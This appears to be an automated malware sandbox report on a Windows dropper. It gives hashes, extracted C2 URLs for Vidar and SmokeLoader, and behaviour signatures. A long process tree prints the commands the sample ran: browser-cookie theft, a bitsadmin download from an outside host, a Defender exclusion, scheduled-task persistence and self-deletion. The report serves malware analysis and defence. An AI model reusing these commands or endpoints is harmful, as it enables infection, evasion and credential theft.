Analysis

  • max time kernel
    85s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 23:02

General

  • Target

    a0e87c4b9483fae95f6f57946023d3e7.exe

  • Size

    2.8MB

  • MD5

    a0e87c4b9483fae95f6f57946023d3e7

  • SHA1

    993ab6ddf0f3dfa349ef7ad4e3a44d0fc2a15a0a

  • SHA256

    bb7dead4d3da28e16ef45d0019cd42bbd3c4e3454c3042867e7f64aee2439912

  • SHA512

    95979bbfb68d50223fa05e35a7fa6552a30889a07327347d8a6d03a80fc8d92bbcd4f7456431aceb7fc43acc784610d196e2d002baee9278c762e45852ee69b1

Malware Config

Extracted

Family

vidar

Version

39.7

Botnet

706

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE DTLoader Binary Request M2
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 3 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 48 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 11 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2588
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2804
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2788
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1872
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1396
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1264
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1196
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:408
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:68
                    • C:\Users\Admin\AppData\Local\Temp\a0e87c4b9483fae95f6f57946023d3e7.exe
                      "C:\Users\Admin\AppData\Local\Temp\a0e87c4b9483fae95f6f57946023d3e7.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:652
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3712
                        • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS08E22454\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2956
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sahiba_1.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1188
                            • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.exe
                              sahiba_1.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:1656
                              • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_1.exe" -a
                                6⤵
                                • Executes dropped EXE
                                PID:3200
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sahiba_2.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2128
                            • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_2.exe
                              sahiba_2.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:3196
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sahiba_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3048
                            • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_3.exe
                              sahiba_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3512
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im sahiba_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_3.exe" & del C:\ProgramData\*.dll & exit
                                6⤵
                                  PID:1588
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im sahiba_3.exe /f
                                    7⤵
                                    • Kills process with taskkill
                                    PID:1804
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:5288
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:740
                              • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_4.exe
                                sahiba_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4092
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c sahiba_7.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2340
                              • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_7.exe
                                sahiba_7.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:2652
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c cmd < Compatto.rtf
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2948
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd
                                    7⤵
                                      PID:384
                                      • C:\Windows\SysWOW64\findstr.exe
                                        findstr /V /R "^jvMDwkwydQdmnxGPmMOjYlbIlopECWXOZojRKCmISYgoKPYfXOyLKoMeYraSevCxTCAdoOyWjyxqVfYxlTHNQkrRvpTHpGGccUgofIipJpnFNMuJyYIpPPDHnITYVnMGn$" Oggi.rtf
                                        8⤵
                                          PID:4252
                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                          Triste.exe.com n
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4288
                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com n
                                            9⤵
                                            • Executes dropped EXE
                                            PID:4444
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 30
                                          8⤵
                                          • Runs ping.exe
                                          PID:4324
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sahiba_8.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3788
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_8.exe
                                    sahiba_8.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3764
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4044
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4820
                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4204
                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4772
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c sahiba_6.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3936
                                  • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_6.exe
                                    sahiba_6.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2024
                                    • C:\Users\Admin\Documents\_OtynRYe3ZLZnVFIpErf6VEd.exe
                                      "C:\Users\Admin\Documents\_OtynRYe3ZLZnVFIpErf6VEd.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4696
                                    • C:\Users\Admin\Documents\IOYPoqQU73Gv2FP3F32t_hvY.exe
                                      "C:\Users\Admin\Documents\IOYPoqQU73Gv2FP3F32t_hvY.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:4144
                                    • C:\Users\Admin\Documents\gszHrMkJzZmstqiNRzHDNvB4.exe
                                      "C:\Users\Admin\Documents\gszHrMkJzZmstqiNRzHDNvB4.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4684
                                      • C:\Users\Admin\Documents\gszHrMkJzZmstqiNRzHDNvB4.exe
                                        "C:\Users\Admin\Documents\gszHrMkJzZmstqiNRzHDNvB4.exe"
                                        7⤵
                                          PID:5688
                                      • C:\Users\Admin\Documents\8aicJrbOsey8zRJwVAHeOLKr.exe
                                        "C:\Users\Admin\Documents\8aicJrbOsey8zRJwVAHeOLKr.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:1184
                                        • C:\Users\Admin\AppData\Roaming\updata.exe
                                          C:\Users\Admin\AppData\Roaming\updata.exe updata
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5676
                                          • C:\Users\Admin\AppData\Roaming\updata.exe
                                            "C:\Users\Admin\AppData\Roaming\updata.exe"
                                            8⤵
                                              PID:4344
                                        • C:\Users\Admin\Documents\Q32aHU9cL65GhQlexT6kUpuC.exe
                                          "C:\Users\Admin\Documents\Q32aHU9cL65GhQlexT6kUpuC.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3840
                                          • C:\Users\Admin\Documents\Q32aHU9cL65GhQlexT6kUpuC.exe
                                            C:\Users\Admin\Documents\Q32aHU9cL65GhQlexT6kUpuC.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3984
                                        • C:\Users\Admin\Documents\SB3FzSx2ofQWV_7YuG6T56jt.exe
                                          "C:\Users\Admin\Documents\SB3FzSx2ofQWV_7YuG6T56jt.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4672
                                        • C:\Users\Admin\Documents\vE3A86kZbDvIuYN6x4ArfxGu.exe
                                          "C:\Users\Admin\Documents\vE3A86kZbDvIuYN6x4ArfxGu.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:5080
                                          • C:\Users\Public\run.exe
                                            C:\Users\Public\run.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5852
                                            • C:\Users\Public\run.exe
                                              C:\Users\Public\run.exe
                                              8⤵
                                                PID:5248
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                  9⤵
                                                    PID:3936
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /T 10 /NOBREAK
                                                      10⤵
                                                      • Delays execution with timeout.exe
                                                      PID:5356
                                              • C:\Users\Public\run2.exe
                                                C:\Users\Public\run2.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                PID:5884
                                                • C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
                                                  "C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"
                                                  8⤵
                                                    PID:3712
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp29BC.tmp.cmd""
                                                      9⤵
                                                        PID:6132
                                                        • C:\Windows\system32\timeout.exe
                                                          timeout 4
                                                          10⤵
                                                          • Delays execution with timeout.exe
                                                          PID:1856
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks.exe /create /f /sc MINUTE /mo 1 /tn "MicrosoftApi" /tr "'C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"'
                                                          10⤵
                                                          • Creates scheduled task(s)
                                                          PID:4232
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp29BB.tmp.cmd""
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:1556
                                                        • C:\Windows\system32\timeout.exe
                                                          timeout 4
                                                          10⤵
                                                          • Delays execution with timeout.exe
                                                          PID:8
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi
                                                          10⤵
                                                          • Blocklisted process makes network request
                                                          PID:4540
                                                • C:\Users\Admin\Documents\FkCtnkw3vKOG9rsGatpBswB_.exe
                                                  "C:\Users\Admin\Documents\FkCtnkw3vKOG9rsGatpBswB_.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:4000
                                                • C:\Users\Admin\Documents\p2oI2eM73ztp5mk71m7tiBao.exe
                                                  "C:\Users\Admin\Documents\p2oI2eM73ztp5mk71m7tiBao.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4136
                                                  • C:\Users\Admin\Documents\p2oI2eM73ztp5mk71m7tiBao.exe
                                                    C:\Users\Admin\Documents\p2oI2eM73ztp5mk71m7tiBao.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3796
                                                • C:\Users\Admin\Documents\Y5Vo9vE56kirBdXZiKXBKwek.exe
                                                  "C:\Users\Admin\Documents\Y5Vo9vE56kirBdXZiKXBKwek.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:2240
                                                  • C:\Users\Admin\Documents\Y5Vo9vE56kirBdXZiKXBKwek.exe
                                                    C:\Users\Admin\Documents\Y5Vo9vE56kirBdXZiKXBKwek.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4540
                                                • C:\Users\Admin\Documents\diP73t6su1Dg58182_n3lgO1.exe
                                                  "C:\Users\Admin\Documents\diP73t6su1Dg58182_n3lgO1.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:2428
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5728
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:996
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5836
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:1556
                                                  • C:\Users\Admin\Documents\a8TbBUVQvHNH1bK_nv9wBfhf.exe
                                                    "C:\Users\Admin\Documents\a8TbBUVQvHNH1bK_nv9wBfhf.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4812
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      7⤵
                                                        PID:5476
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          8⤵
                                                          • Kills process with taskkill
                                                          PID:5624
                                                    • C:\Users\Admin\Documents\1s0kQSg3MLUY93N4koBi4AYQ.exe
                                                      "C:\Users\Admin\Documents\1s0kQSg3MLUY93N4koBi4AYQ.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:4560
                                                      • C:\Users\Admin\Documents\1s0kQSg3MLUY93N4koBi4AYQ.exe
                                                        "C:\Users\Admin\Documents\1s0kQSg3MLUY93N4koBi4AYQ.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:2456
                                                    • C:\Users\Admin\Documents\PmrrQVoXpYJwthj2JemsMB9X.exe
                                                      "C:\Users\Admin\Documents\PmrrQVoXpYJwthj2JemsMB9X.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:1700
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5124
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5488
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4948
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:2840
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3864
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5136
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5688
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb4921.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4960
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                      7⤵
                                                                      • Download via BitsAdmin
                                                                      PID:5060
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3860
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08E22454\sahiba_5.exe
                                                                  sahiba_5.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4024
                                                                  • C:\Users\Admin\AppData\Roaming\6353368.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6353368.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3964
                                                                    • C:\Windows\system32\WerFault.exe
                                                                      C:\Windows\system32\WerFault.exe -u -p 3964 -s 1888
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:4156
                                                                  • C:\Users\Admin\AppData\Roaming\6772078.exe
                                                                    "C:\Users\Admin\AppData\Roaming\6772078.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4108
                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4708
                                                                  • C:\Users\Admin\AppData\Roaming\4067832.exe
                                                                    "C:\Users\Admin\AppData\Roaming\4067832.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4148
                                                                  • C:\Users\Admin\AppData\Roaming\8918461.exe
                                                                    "C:\Users\Admin\AppData\Roaming\8918461.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4224
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 2076
                                                                      7⤵
                                                                      • Drops file in Windows directory
                                                                      • Program crash
                                                                      PID:6092
                                                        • \??\c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                          1⤵
                                                          • Suspicious use of SetThreadContext
                                                          • Modifies registry class
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1100
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                            2⤵
                                                            • Checks processor information in registry
                                                            • Modifies data under HKEY_USERS
                                                            • Modifies registry class
                                                            PID:4104
                                                        • C:\Windows\system32\rundll32.exe
                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          PID:4772
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                            2⤵
                                                            • Loads dropped DLL
                                                            • Modifies registry class
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4804
                                                        • C:\Users\Admin\AppData\Local\Temp\CDE0.exe
                                                          C:\Users\Admin\AppData\Local\Temp\CDE0.exe
                                                          1⤵
                                                            PID:5608
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\oylzbihg\
                                                              2⤵
                                                                PID:5564
                                                              • C:\Windows\SysWOW64\cmd.exe
